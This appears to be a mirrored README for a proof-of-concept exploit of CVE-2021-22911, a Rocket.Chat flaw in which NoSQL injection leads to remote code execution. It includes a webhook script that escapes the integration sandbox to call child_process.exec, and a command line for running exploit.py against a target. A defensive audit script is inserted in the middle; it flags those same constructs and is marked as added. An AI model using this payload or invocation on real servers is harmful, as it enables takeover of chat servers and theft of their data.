CVE-2021-22911 PoC: Rocket.Chat Security Vulnerability

Source
Associated Vulnerability
Title: Rocket.Chat Security Vulnerability (CVE-2021-22911)
Description: An improper input sanitization vulnerability exists in Rocket.Chat server 3.11, 3.12 & 3.13 that could lead to unauthenticated NoSQL injection, resulting potentially in RCE.
Description
some small changes to the code by CsEnox
Readme
# CVE-2021-22911-EXP

## Info

Some small changes to the [code](https://github.com/CsEnox/CVE-2021-22911) by CsEnox:

1. Replace the `oathtool` library with the `pyotp` library.
2. Modify the format of the JavaScript script used to construct the webhook.

```javascript
class Script {
  process_incoming_request({ request }) {
    const require = console.log.constructor('return process.mainModule.require')();
    const { exec } = require('child_process');
    exec('your command');
  }
}
```
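For administrators reviewing an instance, the following added example (not part of the original README or of CsEnox's code) flags integration scripts that contain the sandbox-escape constructs visible in the script above. The record field names (`_id`, `name`, `scriptEnabled`, `script`) and the sample records are assumptions constructed for illustration.

```javascript
// Added example: audit heuristic for Rocket.Chat integration scripts.
// Field names (_id, name, scriptEnabled, script) are assumptions about the export.
const INDICATORS = [
  { name: 'function-constructor', re: /\.constructor\s*\(\s*['"`]/ },
  { name: 'process.mainModule', re: /process\s*\.\s*mainModule/ },
  { name: 'child_process', re: /child_process/ },
  { name: 'command-exec-call', re: /\b(?:exec|execSync|spawn|spawnSync)\s*\(/ },
];

// Returns the indicators found in one integration record.
function auditIntegration(rec) {
  const script = typeof rec.script === 'string' ? rec.script : '';
  const hits = INDICATORS.filter((i) => i.re.test(script)).map((i) => i.name);
  return { id: rec._id, name: rec.name, active: rec.scriptEnabled === true, hits };
}

// Returns only the records that need review, most indicators first.
function auditAll(records) {
  return records
    .map(auditIntegration)
    .filter((r) => r.hits.length > 0)
    .sort((a, b) => b.hits.length - a.hits.length);
}

// Constructed sample records (not real data).
const SAMPLE = [
  {
    _id: 'sample-1', name: 'ci-notify', scriptEnabled: true,
    script: 'class Script {\n  process_incoming_request({ request }) {\n' +
      '    return { content: { text: request.content.text } };\n  }\n}',
  },
  {
    _id: 'sample-2', name: 'hook', scriptEnabled: true,
    script: 'class Script {\n  process_incoming_request({ request }) {\n' +
      "    const require = console.log.constructor('return process.mainModule.require')();\n" +
      "    const { exec } = require('child_process');\n    exec('your command');\n  }\n}",
  },
];

for (const r of auditAll(SAMPLE)) {
  console.log(`${r.id} (${r.name}) active=${r.active}: ${r.hits.join(', ')}`);
}
```

A match is a prompt for manual review of the integration and of who created it, not proof of compromise; string matching of this kind is easy to evade and should complement upgrading to a patched server version.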

## Notice

1. You can check whether the webhook executed successfully using the `wget` command, provided that this command is installed in the Docker container.
2. The default administrator username in the code is `admin`.

## Usage

```cmd
python exploit.py -u "user@rocket.local" -a "admin@rocket.local" -t "http://rocket.local"
```

File Snapshot

```
[4.0K] /data/pocs/e2c8cda4098ba47550f20cf9629ad01643241f74
├── [6.4K] exploit.py
└── [ 831] README.md

0 directories, 2 files
```